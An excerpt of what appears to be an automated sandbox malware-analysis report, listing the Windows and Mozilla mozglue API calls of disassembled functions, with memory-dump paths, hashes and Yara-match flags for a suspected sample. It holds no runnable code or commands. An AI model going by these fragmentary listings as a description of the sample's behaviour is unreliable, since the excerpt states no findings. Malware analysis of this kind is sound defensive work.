                                                                                                                                                                                                                                • Part of subcall function 6BB8BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BBD7A3F), ref: 6BB8BF5D
                                                                                                                                                                                                                                • Part of subcall function 6BB8BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BBD7A3F), ref: 6BB8BF7E
                                                                                                                                                                                                                              • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6BBD7A48
                                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6BBD7A7A
                                                                                                                                                                                                                                • Part of subcall function 6BB89830: free.MOZGLUE(?,?,?,6BBD7ABE), ref: 6BB8985B
                                                                                                                                                                                                                              • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BBD7AC0
                                                                                                                                                                                                                              • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BBD7AC8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3421697164-0
                                                                                                                                                                                                                              • Opcode ID: ee5c3a63549e3378eb3e9998bb044c0cd116ee5cac033b47a38b136a091eae64
                                                                                                                                                                                                                              • Instruction ID: 40d7b13eb6f65959c309e34ee855271a26ae59c1995bd3c567fba635a48e2a9f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee5c3a63549e3378eb3e9998bb044c0cd116ee5cac033b47a38b136a091eae64
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E2171356043049FCB14DF28E895A6EFBE5FF89354F00481CE84687361CB35E909CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BB8BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BBD7A3F), ref: 6BB8BF11
                                                                                                                                                                                                                                • Part of subcall function 6BB8BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BBD7A3F), ref: 6BB8BF5D
                                                                                                                                                                                                                                • Part of subcall function 6BB8BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BBD7A3F), ref: 6BB8BF7E
                                                                                                                                                                                                                              • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6BBD7968
                                                                                                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6BBDA264,6BBDA264), ref: 6BBD799A
                                                                                                                                                                                                                                • Part of subcall function 6BB89830: free.MOZGLUE(?,?,?,6BBD7ABE), ref: 6BB8985B
                                                                                                                                                                                                                              • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BBD79E0
                                                                                                                                                                                                                              • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BBD79E8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3421697164-0
                                                                                                                                                                                                                              • Opcode ID: f4c1997b2a3255a98f3bde7d58261b0112c429dd54540341d98d569fb6559687
                                                                                                                                                                                                                              • Instruction ID: 2e42c5e99c6575e5330b8f8494f273eabf8a5a82b18de2898855d348af52a95a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4c1997b2a3255a98f3bde7d58261b0112c429dd54540341d98d569fb6559687
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 842171356043049FCB14DF28D885A6EFBE5FF89354F04881DE84687361CB35E909CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBDAAF8
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFF770,?,6BB9BF9F), ref: 6BBDAB08
                                                                                                                                                                                                                              • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6BB9BF9F), ref: 6BBDAB39
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFF770,?,?,?,?,?,?,?,?,6BB9BF9F), ref: 6BBDAB6B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1951318356-0
                                                                                                                                                                                                                              • Opcode ID: 3591ae27e6b52e615b2e04162592f1841bb893bc000c11f427cd4fd9bcafa728
                                                                                                                                                                                                                              • Instruction ID: 6fe0c50ebb2bffa7fe55c1de16e9d6f055ce9e4a10ea159370e3d91354f038e6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3591ae27e6b52e615b2e04162592f1841bb893bc000c11f427cd4fd9bcafa728
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D11154B5E012499FCF00DFA8E8859AFBBB9FF493047044429E50597301E739E909CBB1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                                                                                                                                                              • String ID: %dx%d
                                                                                                                                                                                                                              • API String ID: 2716131235-2206825331
                                                                                                                                                                                                                              • Opcode ID: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
                                                                                                                                                                                                                              • Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcatlstrcpy
                                                                                                                                                                                                                              • String ID: 6F@$6F@
                                                                                                                                                                                                                              • API String ID: 3905823039-140834422
                                                                                                                                                                                                                              • Opcode ID: 0fd21debb5ed307de285645c5bfc8b86321b2cbbfd8b437667256a76d532ad3c
                                                                                                                                                                                                                              • Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fd21debb5ed307de285645c5bfc8b86321b2cbbfd8b437667256a76d532ad3c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1243822799-0
                                                                                                                                                                                                                              • Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                              • Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBEB11
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEB1E
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BBBEB3C
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEB5B
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBEBA4
                                                                                                                                                                                                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BBBEBAC
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBEBC1
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8,?,?,00000000), ref: 6BBBEBCE
                                                                                                                                                                                                                              • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BBBEBE5
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8,00000000), ref: 6BBBEC37
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BBBEC46
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BBBEC55
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6BBBEC5C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BBBEA9B
                                                                                                                                                                                                                              • [I %d/%d] profiler_start, xrefs: 6BBBEBB4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
                                                                                                                                                                                                                              • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                                                                                                                                                              • API String ID: 2885072826-1186885292
                                                                                                                                                                                                                              • Opcode ID: 10183d728a29ff1fb762cfce4a702170a3d5cda4bc114536ea53f572aba3e33e
                                                                                                                                                                                                                              • Instruction ID: f2f4ee7a71b782d7f5c6b40646695b41ba40dc093a8e6325abfeecda7dc87d3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10183d728a29ff1fb762cfce4a702170a3d5cda4bc114536ea53f572aba3e33e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AF0A735A022509BEB205F69F885B7D7B6CEB82295F000465E605D3350CB7AD446C775
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBC20B7
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(00000000,?,6BBAFBD1), ref: 6BBC20C0
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6BBAFBD1), ref: 6BBC20DA
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,6BBAFBD1), ref: 6BBC20F1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2047719359-0
                                                                                                                                                                                                                              • Opcode ID: 0fa1cfd2398eea620e7f6142d8da432fb532522a23ec99ee80bbb40da7c23d5d
                                                                                                                                                                                                                              • Instruction ID: 5ba36317777cdf994ab85a2720b22d8b58e51f59623d8209db7b38c845fb4039
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fa1cfd2398eea620e7f6142d8da432fb532522a23ec99ee80bbb40da7c23d5d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18E0ED35500A148FC230DF35E80565FBBEEFF86214B00062BE54A83600EB7AE9428ADA
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6BB79B2C
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(6BB799CF,00000000,?), ref: 6BB79BB6
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6BB79BF8
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6BB79DE4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                                                              • Opcode ID: 67417d22b0a3916f566ee3a79fae89fdea652fccac4bdb564d0f9db9e583b891
                                                                                                                                                                                                                              • Instruction ID: 0419272b96b876971536f1fe016463e0b4e1c0a1391aa2ecb3a48fb31b90ab83
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67417d22b0a3916f566ee3a79fae89fdea652fccac4bdb564d0f9db9e583b891
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFD18B71A0024A9FCF24CF68C881AAEBBF2FF88314F184529E956A7351D775ED11CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BB837F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6BBD145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6BB8380A
                                                                                                                                                                                                                                • Part of subcall function 6BBB8DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6BBD06E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6BBB8DCC
                                                                                                                                                                                                                                • Part of subcall function 6BBC0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6BBC138F,?,?,?), ref: 6BBC0B80
                                                                                                                                                                                                                              • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6BBC138F,?,?,?), ref: 6BBC0B27
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,6BBC138F,?,?,?), ref: 6BBC0B3F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • baseprofiler::profiler_capture_backtrace, xrefs: 6BBC0AB5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
                                                                                                                                                                                                                              • String ID: baseprofiler::profiler_capture_backtrace
                                                                                                                                                                                                                              • API String ID: 3592261714-147032715
                                                                                                                                                                                                                              • Opcode ID: 6f3aeeebe035d8019b5229f3cb39441578064e62e6774593818b690dad27366b
                                                                                                                                                                                                                              • Instruction ID: d138d0b7ce0725cc1b1388619d64e9d03f561c1ae068e8b30f757b2f16cdff66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f3aeeebe035d8019b5229f3cb39441578064e62e6774593818b690dad27366b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8821D6B4A002859BDB04DF68D891BBF73BAEF85708F44046CE9159B341DB79E901CBA2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • calloc.MOZGLUE(?,?), ref: 6BB7F19B
                                                                                                                                                                                                                                • Part of subcall function 6BB9D850: EnterCriticalSection.KERNEL32(?), ref: 6BB9D904
                                                                                                                                                                                                                                • Part of subcall function 6BB9D850: LeaveCriticalSection.KERNEL32(?), ref: 6BB9D971
                                                                                                                                                                                                                                • Part of subcall function 6BB9D850: memset.VCRUNTIME140(?,00000000,?), ref: 6BB9D97B
                                                                                                                                                                                                                              • mozalloc_abort.MOZGLUE(?), ref: 6BB7F209
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                              • API String ID: 3775194440-2564639436
                                                                                                                                                                                                                              • Opcode ID: a94394600e3f16d00822a6cee3032e2ae28a386961a53edc5f2a86bd3613bb3a
                                                                                                                                                                                                                              • Instruction ID: 33883ba3c576ae0d59545d4383f1a97bcb0d9914216032bb3a1f38f4c6facec0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a94394600e3f16d00822a6cee3032e2ae28a386961a53edc5f2a86bd3613bb3a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03115932E04AC987DB049F68D9611BEB36ADF86218B01513DEC15AB212EB75EA84C384
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                              • GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
